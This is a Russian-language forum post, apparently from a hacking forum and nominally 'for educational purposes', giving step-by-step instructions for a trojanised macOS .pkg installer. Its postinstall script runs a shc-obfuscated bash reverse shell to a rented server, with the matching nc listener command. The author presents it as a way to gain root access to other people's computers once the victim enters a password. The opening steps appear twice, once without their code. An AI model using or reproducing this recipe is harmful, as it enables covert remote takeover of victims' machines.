Дисклеймер: в образовательных целях
Всем привет! Я снова вернулся к apple и их продуктам. Нашел довольно интересный способ заражения через pkg с root-правами. Реализовать не сложно, поэтому погнали
1. Cкачиваем Package Builder
2. пишем скрипты sh и ставим shc
для файла postinstall.sh пишем команду
Собираем файл check.sh командами
3. Открываем прогу Package Builder создаем пакет и заполняем информацию
Чудно сделали дальше добавляем наши скрипты
Так остается подписать пакет apple developer сертфикатом и можно устанавливать на чужие компы. Я им не подписывал заработало, и у вас должно.
Нажимаем на молоточек чтобы собрать пакет
4. Покупаем дедик для принятия коннектов и его айпи введите в файле check.sh с портом. вводим команду
5. Получаем профит пользователь вводит пароль софт устанавливается идет скриптинг и к нам на сервер приходит root доступ к компьютеру, а через команду
Всем привет! Я снова вернулся к apple и их продуктам. Нашел довольно интересный способ заражения через pkg с root-правами. Реализовать не сложно, поэтому погнали
1. Cкачиваем Package Builder
2. пишем скрипты sh и ставим shc
brew install shc
Bash:
#postinstall.sh
#!/bin/bash
./check
для файла postinstall.sh пишем команду
Код:
chmod +x postinstall.sh
Bash:
#check.sh
#!/bin/sh
bash -i >& /dev/tcp/<ip>/<port> 0>&1 &
Собираем файл check.sh командами
Код:
chmod +x check.sh
shc -f check.sh
gcc -o check check.sh.x.c
chmod +x check
./check
3. Открываем прогу Package Builder создаем пакет и заполняем информацию
Чудно сделали дальше добавляем наши скрипты
Так остается подписать пакет apple developer сертфикатом и можно устанавливать на чужие компы. Я им не подписывал заработало, и у вас должно.
Нажимаем на молоточек чтобы собрать пакет
4. Покупаем дедик для принятия коннектов и его айпи введите в файле check.sh с портом. вводим команду
nc -lvnp <port>5. Получаем профит пользователь вводит пароль софт устанавливается идет скриптинг и к нам на сервер приходит root доступ к компьютеру, а через команду
open -a TextEdit можем запускать приложение блокнот и не только
Последнее редактирование: